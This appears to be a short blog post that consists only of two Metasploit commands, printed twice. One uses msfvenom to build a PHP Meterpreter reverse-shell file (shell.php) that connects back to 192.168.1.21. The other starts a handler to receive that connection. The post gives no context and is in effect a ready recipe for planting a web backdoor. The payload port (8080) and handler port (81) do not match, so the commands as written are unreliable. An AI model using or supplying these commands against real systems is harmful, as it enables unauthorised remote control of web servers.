Commands:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.21 LPORT=8080 -f raw > shell.php
msfcli exploit/multi/handler LHOST=192.168.1.21 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
Commands:
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.21 LPORT=8080 -f raw > shell.php
msfcli exploit/multi/handler LHOST=192.168.1.21 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E
0 komentari:
Objavi komentar